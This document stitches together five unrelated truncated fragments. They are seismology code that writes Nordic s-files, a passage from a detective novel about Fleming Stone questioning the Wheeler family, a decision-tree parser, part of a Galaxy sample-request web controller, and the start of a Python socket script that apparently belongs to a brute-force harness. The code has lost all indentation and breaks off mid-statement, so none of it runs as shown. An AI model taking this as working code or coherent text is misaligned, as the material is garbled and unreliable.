depth.rjust(5) + agency.rjust(5) + ksta.rjust(3) +
timerms.rjust(4) +
conv_mags[0]['mag'].rjust(4) + conv_mags[0]['type'].rjust(1) +
conv_mags[0]['agency'][0:3].rjust(3) +
conv_mags[1]['mag'].rjust(4) + conv_mags[1]['type'].rjust(1) +
conv_mags[1]['agency'][0:3].rjust(3) +
conv_mags[2]['mag'].rjust(4) + conv_mags[2]['type'].rjust(1) +
conv_mags[2]['agency'][0:3].rjust(3) + '1' + '\n')
# Write line 2 of s-file
sfile.write(' ACTION:ARG ' + str(datetime.datetime.now().year)[2:4] + '-' +
str(datetime.datetime.now().month).zfill(2) + '-' +
str(datetime.datetime.now().day).zfill(2) + ' ' +
str(datetime.datetime.now().hour).zfill(2) + ':' +
str(datetime.datetime.now().minute).zfill(2) + ' OP:' +
userid.ljust(4) + ' STATUS:' + 'ID:'.rjust(18) +
str(evtime.year) +
str(evtime.month).zfill(2) +
str(evtime.day).zfill(2) +
str(evtime.hour).zfill(2) +
str(evtime.minute).zfill(2) +
str(evtime.second).zfill(2) +
'I'.rjust(6) + '\n')
# Write line 3 of s-file
for wavefile in wavefiles:
sfile.write(' ' + os.path.basename(wavefile) +
'6'.rjust(79 - len(os.path.basename(wavefile))) + '\n')
# Write final line of s-file
sfile.write(' STAT SP IPHASW D HRMM SECON CODA AMPLIT PERI AZIMU' +
' VELO AIN AR T<NAME> <NAME>Z7\n')
# Now call the populate sfile function
if len(event.picks) > 0:
newpicks = '\n'.join(nordpick(event))
sfile.write(newpicks + '\n')
sfile.write('\n'.rjust(81))
if not string_io:
sfile.close()
return str(sfilename)
else:
return
def nordpick(event):
"""
Format picks in an :class:`~obspy.core.event.event.Event` to nordic.
:type event: :class:`~obspy.core.event.event.Event`
:param event: A single obspy event.
:returns: List of String
.. note::
Currently finalweight is unsupported, nor is velocity, or
angle of incidence. This is because
:class:`~obspy.core.event.event.Event` stores slowness
in s/deg and takeoff angle, which would require computation
from the values stored in seisan. Multiple weights are also
not supported.
"""
pick_strings = []
for pick in event.picks:
if not pick.waveform_id:
msg = ('No waveform id for pick at time %s, skipping' % pick.time)
warnings.warn(msg)
continue
# Convert string to short sting
if pick.onset == 'impulsive':
impulsivity = 'I'
elif pick.onset == 'emergent':
impulsivity = 'E'
else:
impulsivity = ' '
# Convert string to short string
if pick.polarity == 'positive':
polarity = 'C'
elif pick.polarity == 'negative':
polarity = 'D'
else:
polarity = ' '
# Extract velocity: Note that horizontal slowness in quakeML is stored
# as s/deg
if pick.horizontal_slowness is not None:
# velocity = 1.0 / pick.horizontal_slowness
velocity = ' ' # Currently this conversion is unsupported.
else:
velocity = ' '
# Extract azimuth
if pick.backazimuth is not None:
azimuth = pick.backazimuth
else:
azimuth = ' '
# Extract the correct arrival info for this pick - assuming only one
# arrival per pick...
arrival = [arrival for arrival in event.origins[0].arrivals
if arrival.pick_id == pick.resource_id]
if len(arrival) > 0:
arrival = arrival[0]
# Extract weight - should be stored as 0-4, or 9 for seisan.
if arrival.time_weight is not None:
weight = int(arrival.time_weight)
else:
weight = '0'
# Extract azimuth residual
if arrival.backazimuth_residual is not None:
azimuthres = int(arrival.backazimuth_residual)
else:
azimuthres = ' '
# Extract time residual
if arrival.time_residual is not None:
timeres = arrival.time_residual
else:
timeres = ' '
# Extract distance
if arrival.distance is not None:
distance = degrees2kilometers(arrival.distance)
if distance >= 100.0:
distance = str(_int_conv(distance))
elif 10.0 < distance < 100.0:
distance = _str_conv(round(distance, 1), 1)
elif distance < 10.0:
distance = _str_conv(round(distance, 2), 2)
else:
distance = _str_conv(distance, False)
else:
distance = ' '
# Extract CAZ
if arrival.azimuth is not None:
caz = int(arrival.azimuth)
else:
caz = ' '
else:
caz = ' '
distance = ' '
timeres = ' '
azimuthres = ' '
azimuth = ' '
weight | |
it niver wud have entered me head again, savin’ your
speakin’ of it now. Why—was it the—the man that——”
“Oh, probably not. But everything I can learn is of help in discovering
the criminal and perhaps freeing your employers from suspicion.”
“And I wish that might be! To put it on the good man, now! And worse,
upon the ladies—angels, both of them!”
“You are fond of the family, then?”
“I am that! I’ve worked here for eight years, and never a cross word from
the missus or the master. As for <NAME>—she’s my darlint.”
“They’re fortunate in having you here,” said Stone, kindly. “That’s all,
now, cook, unless you can remember anything more of that person you saw.”
“Nothin’ more, sor. If I do, I’ll tell you.”
Thinking hard, Stone left her.
It was the most unusual case he had ever attempted. If he looked no
further for the murderer than the Wheeler family, he still had enough to
do in deciding which one of the three was guilty. But he yearned for
another suspect. Not a foolish phantom that went around piping, or a
perhaps imaginary prowler stalking on the piazza, but a real suspect with
a sound, plausible motive.
Though, to be sure, the Wheelers had motive enough. To be condemned to an
absurd restriction and then teased about it, was enough to make life gall
and wormwood to a sensitive man like Wheeler.
And who could say what words had passed between them at that final
interview? Perhaps Appleby had goaded him to the breaking point; perhaps
Wheeler had stood it, but his wife, descending the stairs and hearing the
men talk, had grown desperate at last; or, and Stone knew he thought this
most plausible of all, perhaps Maida, in her window-seat, had stood as
long as she could the aspersions and tauntings directed at her adored
father, and had, with a reckless disregard of consequences, silenced the
enemy forever.
Of young Allen, Stone had no slightest suspicion. To be sure, his
interests were one with the Wheeler family, and moreover, he had hoped
for a release from restrictions that would let the Wheelers go into
Massachusetts and thereby make possible his home there with Maida.
For Maida’s vow that she would never go into the state if her father
could not go, too, was, Allen knew, inviolable.
All this Stone mulled over, yet had no thought that Allen was the one he
was seeking. Also, <NAME> had testified that Allen was with him at
the fire, during the time that included the moment of shooting.
Strolling out into the gardens, the detective made his way to the great
tree, the big sycamore.
Here Fibsy joined him, and at Stone’s tacit nod of permission, the boy
sat down beside his superior on the bench under the tree.
“What’s this about the tree going to Massachusetts?” Fibsy asked, his
freckled face earnestly inquiring.
“One of old Appleby’s jokes,” Stone returned. “Doubtless made just after
a reading of ‘Macbeth.’ You know, or if you don’t, you must read it up
for yourself, there’s a scene there that hinges on Birnam Wood going to
Dunsinane. I can’t take time to tell you about it, but quite evidently it
pleased the old wag to tell Mr. Wheeler that he could go into his native
state when this great tree went there.”
“Meaning not at all, I s’pose.”
“Of course. And any human intervention was not allowed. So though Birnam
Wood _was_ brought to Dunsinane, such a trick is not permissible in his
case. However, that’s beside the point just now. Have you seen any of the
servants?”
“Some. But I got nothing. They’re willing enough to talk, but they don’t
know anything. They say I’d better tackle the ladies’ maid, a fair
Rachel. So I’m going for her. But I bet I won’t strike pay-dirt.”
“You may. Skip along, now, for here comes <NAME>, and she’s probably
looking for me.”
Fibsy departed, and Maida, looking relieved to find Stone alone, came
quickly toward him.
“You see, <NAME>,” she began, “you must _start_ straight in this
thing. And the only start possible is for you to be convinced that I
killed Mr. Appleby.”
“But you must admit, <NAME>, that I am not _too_ absurd in thinking
that though you say you did it, you are saying it to shield some one
else—some one who is near and dear to you.”
“I know you think that—but it isn’t so. How can I convince you?”
“Only by circumstantial evidence. Let me question you a bit. Where did
you get the revolver?”
“From my father’s desk drawer, where he always keeps it.”
“You are familiar with firearms?”
“My father taught me to shoot years ago. I’m not a crack shot—but that
was not necessary.”
“You premeditated the deed?”
“For some time I have felt that I wanted to kill that man.”
“Your conscience?”
“Is very active. I deliberately went against its dictates for my father’s
sake.”
“And you killed Mr. Appleby because he hounded your father in addition to
the long deprivation he had imposed on him?”
“No, not that alone. Oh, I don’t want to tell you—but, if you won’t
believe me otherwise, Mr. Stone, I will admit that I had a new motive——”
“A new one?”
“Yes, a secret that I learned only a day or so before—before Mr.
Appleby’s death.”
“The secret was Appleby’s?”
“Yes; that is, he knew it. He told it to me. If any one else should know
it, it would mean the utter ruin and desolation of the lives of my
parents, compared to which this present condition of living is Paradise
itself!”
“This is true, <NAME>?”
“Absolutely true. _Now_, do you understand why I killed him?”
CHAPTER XIII
<NAME>
Fleming Stone was deeply interested in the Appleby case.
While his logical brain could see no possible way to look save toward one
of the three Wheelers, yet his soul revolted at the thought that any one
of them was the criminal.
Stone was well aware of the fact that the least seemingly guilty often
proved to be a deep-dyed villain, yet he hesitated to think that Dan
Wheeler had killed his old enemy, and he could not believe it was a
woman’s work. He was impressed by Maida’s story, especially by the fact
that a recent development had made her more strongly desirous to be rid
of old Appleby. He wondered if it did not have something to do with young
Appleby’s desire to marry her, and determined to persuade her to confide
further in him regarding the secret she mentioned.
But first, he decided to interview <NAME>. This could not be done
offhand, so he waited a convenient season, and asked for a conference
when he felt sure it would be granted.
<NAME> received the detective in her sitting-room, and her manner
was calm and collected as she asked him to make the interview as brief as
possible.
“You are not well, <NAME>?” Stone asked, courteously.
“I am not ill, Mr. Stone, but naturally these dreadful days have upset
me, and the horror and suspense are still hanging over me. Can you not
bring matters to a crisis? Anything would be better than present
conditions!”
“If some member of your family would tell me the truth,” Stone said
frankly, “it would help a great deal. You know, <NAME>, when three
people insist on being regarded as the criminal, it’s difficult to choose
among them. Now, won’t you, at least, admit that you didn’t shoot Mr.
Appleby?”
“But I did,” and the serene eyes looked at Stone calmly.
“Can you prove it—I mean, to my satisfaction? Tell me this: where did you
get a pistol?”
“I used <NAME>’s revolver.”
“Where did you get it?”
“From the drawer in his desk, where he always keeps it.”
Stone sighed. Of course, both Maida and her mother knew where the
revolver was kept, so this was no test of their veracity as to the crime.
“When did you take it from the drawer?”
Sara Wheeler hesitated for an instant and from that, Stone knew that she
had to think before she spoke. Had she been telling the truth, he argued,
she would have answered at once.
But immediately she spoke, though with a shade of hesitation.
“I took it earlier in the day—I had it up in my own room.”
“Yes; where did you conceal it there?”
“In—in a dresser drawer.”
“And, when you heard the alarm | |
# Copyright (c) 2019. Partners HealthCare and other members of
# Forome Association
#
# Developed by <NAME> based on contributions by <NAME>,
# <NAME>, <NAME> and other members of Division of
# Genetics, Brigham and Women's Hospital
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys, ast
from hashlib import md5
from forome_tools.log_err import logException
from .code_works import normalizeCode
from .code_parse import parseCodeByPortions
#===============================================
class TreeFragment:
def __init__(self, level, tp, line_diap,
base_instr = None, err_info = None, decision = None,
cond_data = None, cond_atoms = None, label = None):
self.mLevel = level
self.mType = tp
self.mLineDiap = line_diap
self.mBaseInstr = base_instr
self.mErrInfo = err_info
self.mCondData = cond_data
self.mDecision = decision
self.mCondAtoms = cond_atoms if cond_atoms is not None else []
self.mLabel = label
def setLineDiap(self, base_diap, full_diap):
self.mBaseLineDiap = base_diap
self.mFullLineDiap = full_diap
def getLevel(self):
return self.mLevel
def getInstrType(self):
return self.mType
def getBaseInstr(self):
return self.mBaseInstr
def getLineDiap(self):
return self.mLineDiap
def getErrorInfo(self):
return self.mErrInfo
def getCondData(self):
return self.mCondData
def getDecision(self):
return self.mDecision
def getLabel(self):
return self.mLabel
def getCondAtoms(self):
return self.mCondAtoms
#===============================================
class CondAtomInfo:
def __init__(self, cond_data, location, warn_msg = None):
self.mCondData = cond_data
self.mLoc = location
self.mErrorMsg = warn_msg
def setError(self, error_msg):
self.mErrorMsg = error_msg
def getLoc(self):
return self.mLoc
def getCondData(self):
return self.mCondData
def resetCondData(self, values):
self.mCondData[:] = values
def getErrorMsg(self):
return self.mErrorMsg
#===============================================
class ParsedDTree:
def __init__(self, eval_space, dtree_code):
self.mEvalSpace = eval_space
self.mFragments = []
self.mCode = normalizeCode(dtree_code)
self.mDummyLinesReg = set()
self.mLabels = dict()
self.mFirstError = None
hash_h = md5()
code_lines = self.mCode.splitlines()
for parsed_d, err_info, line_diap in parseCodeByPortions(
code_lines, self.mDummyLinesReg):
fragments = []
if err_info is None:
assert len(parsed_d.body) == 1
self.mError = None
self.mCurLineDiap = line_diap
try:
instr_d = parsed_d.body[0]
if isinstance(instr_d, ast.Return):
fragments.append(TreeFragment(0, "Return", line_diap,
decision = self.getReturnValue(instr_d)))
elif (isinstance(instr_d, ast.Expr)
and isinstance(instr_d.value, ast.Call)):
fragments.append(self.processCall(instr_d.value,
len(self.mFragments)))
elif isinstance(instr_d, ast.If):
fragments += self.processIf(instr_d)
else:
self.errorIt(instr_d,
"Instructon must be of if-type")
for frag_h in fragments:
line_from, line_to = frag_h.getLineDiap()
for line_no in range(line_from, line_to):
if line_no not in self.mDummyLinesReg:
hash_h.update(bytes(code_lines[line_no - 1],
"utf-8"))
hash_h.update(b'\n')
except Exception as err:
if self.mError is None:
logException("Exception on parse tree code")
raise err
err_info = self.mError
if err_info is not None:
fragments = [TreeFragment(0, "Error", line_diap,
err_info = err_info)]
if self.mFirstError is None:
self.mFirstError = err_info
self.mFragments += fragments
self.mHashCode = hash_h.hexdigest()
self.mCurLineDiap = None
self.mError = None
self.mCondAtoms = None
for frag_h in self.mFragments:
self.mError = frag_h.getErrorInfo()
if self.mError is not None:
break
if self.mError is None:
for idx, frag_h in enumerate(self.mFragments[:-1]):
if frag_h.getLevel() == 0 and frag_h.getDecision() is not None:
err_info = ("Final instruction not in final place",
frag_h.getLineDiap()[0], 0)
self.mFragments[idx] = TreeFragment(0, "Error",
frag_h.getLineDiap(), err_info = err_info)
self.mError = err_info
break
if self.mError is None:
last_frag_h = self.mFragments[-1]
if last_frag_h.getLevel() > 0 or last_frag_h.getDecision() is None:
err_info = ("Final instruction must return True or False",
last_frag_h.getLineDiap()[0], 0)
self.mFragments[-1] = TreeFragment(0, "Error",
frag_h.getLineDiap(), err_info = err_info)
self.mError = err_info
if self.mFirstError is None:
self.mFirstError = self.mError
def getError(self):
return self.mFirstError
def getTreeCode(self):
return self.mCode
def getEvalSpace(self):
return self.mEvalSpace
def getFragments(self):
return self.mFragments
def getHashCode(self):
return self.mHashCode
def isLineIsDummy(self, line_no):
return line_no in self.mDummyLinesReg
def errorIt(self, it, msg_text):
self.mError = (msg_text,
it.lineno + self.mCurLineDiap[0] - 1, it.col_offset)
if self.mFirstError is None:
self.mFirstError = self.mError
raise RuntimeError()
def errorMsg(self, line_no, col_offset, msg_text):
self.mError = (msg_text,
line_no + self.mCurLineDiap[0] - 1, col_offset)
if self.mFirstError is None:
self.mFirstError = self.mError
raise RuntimeError()
def _regCondAtom(self, cond_data, it, it_name, warn_msg = None):
self.mCondAtoms.append(
CondAtomInfo(cond_data,
[it.lineno + self.mCurLineDiap[0] - 1,
it.col_offset,
it.col_offset + len(it_name)], warn_msg))
#===============================================
def processIf(self, instr_d):
self.mCondAtoms = []
cond_data = self._processCondition(instr_d.test)
if len(instr_d.orelse) > 0:
self.errorIt(instr_d.orelse[0],
"Else instruction is not supported")
line_from, line_to = self.mCurLineDiap
decision = self.getSingleReturnValue(instr_d.body)
line_decision = instr_d.body[0].lineno + line_from - 1
ret = [
TreeFragment(0, "If", (line_from, line_decision),
cond_atoms = self.mCondAtoms, cond_data = cond_data),
TreeFragment(1, "Return",
(line_decision, line_to), decision = decision)]
self.mCondAtoms = None
return ret
#===============================================
def processCall(self, instr, point_no):
assert isinstance(instr, ast.Call)
if instr.func.id != "label":
self.errorIt(instr, "Only label() function supported on top level")
if len(instr.args) != 1 or len(instr.keywords) != 0:
self.errorIt(instr, "Only one argument expected for label()")
if isinstance(instr.args[0], ast.Str):
label = instr.args[0].s
elif isinstance(instr.args[0], ast.Name):
label = instr.args[0].id
else:
self.errorIt(instr.args[0],
"String is expected as argument of label()")
if label in self.mLabels:
self.errorIt(instr, "Duplicate label %s" % label)
self.mLabels[label] = point_no
frag_h = TreeFragment(0, "Label", self.mCurLineDiap, label = label)
return frag_h
#===============================================
def getReturnValue(self, instr):
if isinstance(instr.value, ast.NameConstant):
if instr.value.value in (True, False):
return instr.value.value
self.errorIt(instr,
"Only boolean return (True/False) is expected here")
return None
#===============================================
def getSingleReturnValue(self, body):
assert len(body) >= 1
if len(body) > 1:
self.errorIt(body[1],
"Only one instruction is expected here")
instr = body[0]
if not isinstance(instr, ast.Return):
self.errorIt(instr, "Only return instruction is expected here")
return self.getReturnValue(instr)
#===============================================
def _processCondition(self, it):
if isinstance(it, ast.BoolOp):
if isinstance(it.op, ast.And):
seq = ["and"]
elif isinstance(it.op, ast.Or):
seq = ["or"]
else:
self.errorIt(it, "Logic operation not supported")
for val in it.values:
rep_el = self._processCondition(val)
if len(rep_el) == 0:
continue
if rep_el[0] == seq[0]:
seq += rep_el[1:]
else:
seq.append(rep_el)
if len(seq) == 0:
return []
return seq
if isinstance(it, ast.UnaryOp):
if not isinstance(it.op, ast.Not):
self.errorIt(it, "Unary operation not supported")
return ["not", self._processCondition(it.operand)]
if not isinstance(it, ast.Compare):
self.errorIt(it, "Comparison or logic operation expected")
if len(it.ops) == 1 and (isinstance(it.ops[0], ast.In)
or isinstance(it.ops[0], ast.NotIn)):
return self._processEnumInstr(it)
return self._processNumInstr(it)
#===============================================
def _processEnumInstr(self, it):
assert len(it.comparators) == 1
it_set = it.comparators[0]
if isinstance(it.ops[0], ast.NotIn):
op_mode = "NOT"
else:
assert isinstance(it.ops[0], ast.In)
op_mode = "OR"
if isinstance(it_set, ast.Call):
if (len(it_set.args) != 1 or len(it_set.keywords) > 0
or not it_set.func
or not isinstance(it_set.func, ast.Name)):
self.errorIt(it_set, "Complex call not supported")
if it_set.func.id == "all":
if op_mode == "NOT":
self.errorIt(it_set, "Complex call not supported")
op_mode = "AND"
it_set = it_set.args[0]
else:
self.errorIt(it_set,
"Only pseudo-function all is supported")
variants = self.processIdSet(it_set)
#if len(variants) == 0:
# self.errorIt(it_set, "Empty set")
if isinstance(it.left, ast.Name):
field_name = it.left.id
warn_msg = None
ret = ["enum", field_name, op_mode, variants]
if self.mEvalSpace is not None:
unit_h = self.mEvalSpace.getUnit(field_name)
if unit_h is None:
warn_msg = "Inactive enum field"
if op_mode == "NOT":
ret = []
else:
ret = [None]
else:
if not unit_h.isInDTrees():
self.errorIt(it.left,
"No support for field %s in decision trees"
% field_name)
elif unit_h.getUnitKind() == "func":
self.errorIt(it.left,
"Field %s should be used as function" % field_name)
if unit_h.getUnitKind() != "enum":
self.errorIt(it.left, "Improper enum field name: "
+ field_name)
self._regCondAtom(ret, it.left, it.left.id, warn_msg)
return ret
if isinstance(it.left, ast.Call):
field_name = it.left.func.id
func_args, warn_msg = dict(), None
ret = ["func", field_name, op_mode, variants, func_args]
if self.mEvalSpace is None:
# No parameters w/o eval space, parse only
del ret[2:]
else:
unit_h = self.mEvalSpace.getUnit(field_name)
if unit_h is None:
warn_msg = "Inactive function"
if op_mode == "NOT":
ret = []
else:
ret = [None]
elif unit_h.getUnitKind() != "func":
self.errorIt(it.left, "Improper functional field name: "
+ field_name)
else:
parameters = unit_h.getParameters()[:]
for it_arg in it.left.args:
if len(parameters) == 0:
self.errorIt(it_arg, "Extra argument of function")
func_args[parameters.pop(0)] = self.processJSonData(
it_arg)
for argval_it in it.left.keywords:
if argval_it.arg in func_args:
self.errorIt(argval_it.value,
"Argument %s duplicated" % argval_it.arg)
if argval_it.arg not in parameters:
self.errorIt(argval_it.value,
"Argument %s not expected" % argval_it.arg)
func_args[argval_it.arg] = self.processJSonData(
argval_it.value)
parameters.remove(argval_it.arg)
err_msg = unit_h.validateArgs(func_args)
if err_msg:
self.errorIt(it.left, err_msg)
self._regCondAtom(ret, it.left, it.left.func.id, warn_msg)
return ret
self.errorIt(it.left, "Name of field is expected")
return None
#===============================================
sNumOpTab = [
(ast.Lt, 1, False),
(ast.LtE, 1, True),
(ast.Eq, 0, True),
(ast.GtE, -1, True),
(ast.Gt, -1, False)]
@classmethod
def determineNumOp(cls, op):
for op_class, ord_mode, eq_mode in cls.sNumOpTab:
if isinstance(op, op_class):
return (ord_mode, eq_mode)
return None, None
def _processNumInstr(self, it):
op_modes = []
for op in it.ops:
if len(op_modes) > 1:
op_modes | |
) )
folder_id = util.restore_text( params.get( 'sample_%i_folder_id' % index, '' ) )
library, folder = self.__get_library_and_folder( trans, library_id, folder_id )
history_id = util.restore_text( params.get( 'sample_%i_history_id' % index, '' ))
if not history_id and sample.history:
history_id = trans.security.encode_id( sample.history.id )
history = self.__get_history(trans, history_id)
wf_tag = 'sample_%i_workflow_id' % index
workflow_id = util.restore_text( params.get( wf_tag , '' ) )
if not workflow_id and sample.workflow:
workflow_id = trans.security.encode_id( sample.workflow['id'] )
workflow_dict = sample.workflow
workflow = self.__get_workflow(trans, workflow_id)
else:
workflow_dict = None
workflow = self.__get_workflow(trans, workflow_id)
if workflow:
workflow_dict = {'id': workflow.id,
'name' : workflow.name,
'mappings': {}}
for k, v in kwd.iteritems():
kwd_tag = "%s_" % wf_tag
if k.startswith(kwd_tag):
# DBTODO Change the key to include the dataset tag, not just the names.
workflow_dict['mappings'][int(k[len(kwd_tag):])] = {'ds_tag':v}
field_values = {}
for field_index, field in enumerate( request.type.sample_form.fields ):
field_name = field['name']
input_value = params.get( 'sample_%i_field_%i' % ( index, field_index ), '' )
if field['type'] == CheckboxField.__name__:
field_value = CheckboxField.is_checked( input_value )
else:
field_value = util.restore_text( input_value )
field_values[ field_name ] = field_value
library_select_field, folder_select_field = self.__build_library_and_folder_select_fields( trans=trans,
user=request.user,
sample_index=index,
libraries=libraries,
sample=None,
library_id=library_id,
folder_id=folder_id,
**kwd )
history_select_field = self.__build_history_select_field( trans=trans,
user=request.user,
sample_index=index,
sample=None,
history_id=history_id,
**kwd)
workflow_select_field = self.__build_workflow_select_field( trans=trans,
user=request.user,
request=request,
sample_index=index,
sample=None,
workflow_dict=workflow_dict,
history_id=history_id,
**kwd)
sample_widgets.append( dict( id=None,
name=name,
bar_code=bar_code,
library=library,
folder=folder,
field_values=field_values,
history=history,
workflow=workflow,
workflow_dict=workflow_dict,
history_select_field=history_select_field,
workflow_select_field=workflow_select_field,
library_select_field=library_select_field,
folder_select_field=folder_select_field ) )
index += 1
return sample_widgets
# ===== Methods for building SelectFields used on various request forms =====
def __build_copy_sample_select_field( self, trans, displayable_sample_widgets ):
copy_sample_index_select_field = SelectField( 'copy_sample_index' )
copy_sample_index_select_field.add_option( 'None', -1, selected=True )
for index, sample_dict in enumerate( displayable_sample_widgets ):
copy_sample_index_select_field.add_option( sample_dict[ 'name' ], index )
return copy_sample_index_select_field
def __build_request_type_id_select_field( self, trans, selected_value='none' ):
accessible_request_types = trans.app.security_agent.get_accessible_request_types( trans, trans.user )
return build_select_field( trans, accessible_request_types, 'name', 'request_type_id', selected_value=selected_value, refresh_on_change=True )
def __build_user_id_select_field( self, trans, selected_value='none' ):
active_users = trans.sa_session.query( trans.model.User ) \
.filter( trans.model.User.table.c.deleted == False ) \
.order_by( trans.model.User.email.asc() )
# A refresh_on_change is required so the user's set of addresses can be displayed.
return build_select_field( trans, active_users, 'email', 'user_id', selected_value=selected_value, refresh_on_change=True )
def __build_sample_operation_select_field( self, trans, is_admin, request, selected_value ):
# The sample_operation SelectField is displayed only after the request has been submitted.
# its label is "For selected samples"
if is_admin:
if request.is_complete:
bulk_operations = [ trans.model.Sample.bulk_operations.CHANGE_STATE ]
if request.is_rejected:
bulk_operations = [ trans.model.Sample.bulk_operations.SELECT_LIBRARY ]
else:
bulk_operations = [ s for i, s in trans.model.Sample.bulk_operations.items() ]
else:
if request.is_complete:
bulk_operations = []
else:
bulk_operations = [ trans.model.Sample.bulk_operations.SELECT_LIBRARY ]
return build_select_field( trans, bulk_operations, 'self', 'sample_operation', selected_value=selected_value, refresh_on_change=True )
def __build_library_and_folder_select_fields( self, trans, user, sample_index, libraries, sample=None, library_id=None, folder_id=None, **kwd ):
# Create the library_id SelectField for a specific sample. The received libraries param is a list of all the libraries
# accessible to the current user, and we add them as options to the library_select_field. If the user has selected an
# existing library then display all the folders of the selected library in the folder_select_field. Library folders do
# not have ACCESS permissions associated with them (only LIBRARY_ADD, LIBRARY_MODIFY, LIBRARY_MANAGE), so all folders will
# be present in the folder_select_field for each library selected.
params = util.Params( kwd )
if sample_index == 'sample_operation':
# build the library selection widget for the bulk sample operation
library_select_field_name= "sample_operation_library_id"
folder_select_field_name = "sample_operation_folder_id"
else:
library_select_field_name= "sample_%i_library_id" % sample_index
folder_select_field_name = "sample_%i_folder_id" % sample_index
if not library_id:
library_id = params.get( library_select_field_name, None )
if not folder_id:
folder_id = params.get( folder_select_field_name, None )
selected_library = None
if library_id not in [ None, 'none' ]:
for library in libraries:
encoded_id = trans.security.encode_id( library.id )
if encoded_id == str( library_id ):
selected_library = library
break
elif sample and sample.library and library_id == 'none':
# The user previously selected a library but is now resetting the selection to 'none'
selected_library = None
elif sample and sample.library:
library_id = trans.security.encode_id( sample.library.id )
selected_library = sample.library
# Build the sample_%i_library_id SelectField with refresh on change enabled
library_select_field = build_select_field( trans,
libraries,
'name',
library_select_field_name,
initial_value='none',
selected_value=str( library_id ).lower(),
refresh_on_change=True )
# Get all folders for the selected library, if one is indeed selected
if selected_library:
folders = self.__get_active_folders( selected_library.root_folder, active_folders_list=[ selected_library.root_folder ] )
if folder_id:
selected_folder_id = folder_id
elif sample and sample.folder:
selected_folder_id = trans.security.encode_id( sample.folder.id )
else:
selected_folder_id = trans.security.encode_id( selected_library.root_folder.id )
else:
selected_folder_id = 'none'
folders = []
# Change the name of the library root folder to clarify that it is the root
for folder in folders:
if not folder.parent:
folder.name = 'Data library root'
break
folder_select_field = build_select_field( trans,
folders,
'name',
folder_select_field_name,
initial_value='none',
selected_value=selected_folder_id )
return library_select_field, folder_select_field
def __build_history_select_field(self, trans, user, sample_index, sample = None, history_id=None, **kwd):
params = util.Params( kwd )
history_select_field_name= "sample_%i_history_id" % sample_index
if not history_id:
history_id = params.get( history_select_field_name, None )
selected_history = None
if history_id not in [ None, 'none', 'new']:
for history in user.histories:
if not history.deleted:
encoded_id = trans.security.encode_id(history.id)
if encoded_id == str(history_id):
selected_history = history
break
elif sample and sample.history and history_id == 'none' or history_id == 'new':
# The user previously selected a history but is now resetting the selection to 'none'
selected_history = None
elif sample and sample.history:
history_id = trans.security.encode_id( sample.history.id )
selected_history = sample.history
# Build the sample_%i_history_id SelectField with refresh on change disabled
hsf = build_select_field( trans,
[h for h in user.histories if not h.deleted],
'name',
history_select_field_name,
initial_value='none',
selected_value=str( history_id ).lower(),
refresh_on_change=True )
# This is ugly, but allows for an explicit "New History", while still using build_select_field.
# hsf.options = hsf.options[:1] + [( "Create a New History", 'new', 'new'==str( history_id ).lower() )] + hsf.options[1:]
hsf.options = [( "Select one", 'none', 'none'==str( history_id ).lower() )] + hsf.options[1:]
return hsf
def __build_workflow_select_field(self, trans, user, request, sample_index, sample=None, workflow_id=None, workflow_dict=None, history_id=None, **kwd ):
params = util.Params( kwd )
workflow_select_field_name= "sample_%i_workflow_id" % sample_index
selected_workflow = None
if not workflow_id:
workflow_id = params.get( workflow_select_field_name, None )
if workflow_id not in [ None, 'none' ]:
selected_workflow = trans.sa_session.query( trans.model.Workflow ).get(trans.security.decode_id(workflow_id))
elif sample and sample.workflow and workflow_id == 'none':
selected_workflow = None
elif sample and sample.workflow:
workflow_id = sample.workflow['id']
selected_workflow = trans.sa_session.query( trans.model.Workflow ).get(sample.workflow['id'])
s_list = [w.latest_workflow for w in user.stored_workflows if not w.deleted]
if selected_workflow and selected_workflow not in s_list:
s_list.append(selected_workflow)
workflow_select_field = build_select_field(trans,
s_list,
'name',
workflow_select_field_name,
initial_value='none',
selected_value=str( workflow_id ).lower(),
refresh_on_change=True )
workflow_select_field.options = [( "Select one", 'none', 'none'==str( workflow_id ).lower() )] + workflow_select_field.options[1:]
wf_fieldset = [workflow_select_field]
if selected_workflow and request.type.external_services:
# DBTODO This will work for now, but should be handled more rigorously.
ds_list = []
external_service = request.type.external_services[0]
dataset_name_re = re.compile( '(dataset\d+)_(name)' )
for k, v in external_service.form_values.content.items():
match = dataset_name_re.match( k )
if match:
ds_list.append(("ds|%s" % k[:-5], v))
if history_id not in [None, 'none', 'new', '']:
hist = trans.sa_session.query( trans.model.History ).get(trans.security.decode_id(history_id))
h_inputs = [("hi|%s" % trans.security.encode_id(ds.id), ds.name) for ds in hist.datasets if not ds.deleted]
ds_list += h_inputs
for step in selected_workflow.steps:
if step.type == 'data_input':
if step.tool_inputs and "name" in step.tool_inputs:
sf_name = '%s_%s' % (workflow_select_field_name, step.id)
select_field = SelectField( name=sf_name )
sf = params.get( sf_name, None )
if not sf and sample and sample.workflow:
if sample.workflow['mappings'].has_key(str(step.id)):
sf = sample.workflow['mappings'][str(step.id)]['ds_tag']
for value, label in ds_list:
if value == sf:
select_field.add_option( label, value, selected=True)
else:
select_field.add_option( label, value )
wf_fieldset.append((step.tool_inputs['name'], select_field))
return wf_fieldset
def __build_sample_state_id_select_field( self, trans, request, selected_value ):
if selected_value == 'none':
if request.samples:
selected_value = trans.security.encode_id( request.samples[0].state.id )
else:
selected_value = trans.security.encode_id( request.type.states[0].id )
return build_select_field( trans,
objs=request.type.states,
label_attr='name',
select_field_name='sample_state_id',
selected_value=selected_value,
refresh_on_change=False )
# ===== Methods for validation forms and fields =====
def __validate_request( self, trans, cntrller, request ):
"""Validates the request entered by the user"""
# TODO: Add checks for required sample fields here.
empty_fields = []
# Make sure required form fields are filled in.
for index, field in enumerate( request.type.request_form.fields ):
if field[ 'required' ] == 'required' and request.values.content[ field[ 'name' ] ] in [ '', None ]:
empty_fields.append( field[ 'label' ] )
empty_sample_fields = []
for s in request.samples:
for field | |
#!/usr/bin/env python3
import socket
import sys
import subprocess
from struct import pack
start_value = 0x00 # Default 0x00. Set higher to speed up runs.
def receive_data(s: socket):
received = b""
continue_receive = True
try:
while continue_receive:
data = s.recv(4096)
received += data
if len(data) < 4096:
continue_receive = False
except Exception as e:
print(e)
return received
